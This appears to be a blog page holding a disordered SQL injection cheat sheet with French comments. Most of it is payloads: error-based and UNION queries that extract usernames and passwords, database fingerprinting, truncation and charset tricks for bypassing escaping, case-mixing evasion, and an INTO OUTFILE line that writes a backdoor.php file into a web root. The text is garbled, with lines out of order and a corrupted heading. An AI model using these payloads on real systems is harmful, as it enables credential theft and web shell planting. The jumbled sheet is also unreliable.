![]() ![]() Order=,cast(( SELECT table_name FROM information_schema.tables WHERE table_catalog=current_database() LIMIT 1 OFFSET 1 ) as numeric) # Get the table (using LIMIT/OFFSET allows iteration) &order=,cast((chr(95)||current_database()) as numeric) # insert into users values(’admin *20 Mou’,’hackedMan’) Įrror-based SQL Injection # All is based on the output, you can then identify the SGBD # insert into users values(’admin’,’findMeIfYouCan’) # create table users (username varchar(10), password varchar(20)) SQL Truncation # You can bypass some SQL restrictions playing with the var size limits S\' group by 2- ds\' union select email, password from users- d Routed SQL Injection # Routed → Double SQL Injection → The first result is injected into the second one Recherche=’ union select username,year from users Recherche=’ union select username,password from users Recherche=’union select null,sql FROM sqlite_master WHERE tbl_name = ’users’ AND type = ’table’ Recherche=’ union select name,null from sqlite_master where type=’table’ Recherche=’ union select null,null from sqlite_master → OK → SQLITE Recherche=’ union select version(),null → NOK → Not a postgres Recherche=’ union select version,null from v$instance → NOK → Not oracle Recherche=’ union select versionnumber,null from sysibm.sysversions → NOK → Not a db2 Recherche=’ union select → NOK → No mysql / mssql Recherche=’ union select null,null from users It means that the antislash added will be interpreted as a part or chinese char and so the quote will be interpreted ![]() # Possible to bypass addslashes and magic_quotes_gpc using chinese charset # If sha1 is used as a binary string (true) you can use an hash to bypass conditions and inject SQL SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c //%0B pour espace possible UNiOn aLl SeleCt 1,2,3,4,conCat(username,0x3a,password,0x3a,flag),6 FroM users UNiOn aLl SeleCt 1,2,3,4,conCat(username,0x3a,password),6 FroM users Union all select 1,2,3,4,"",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |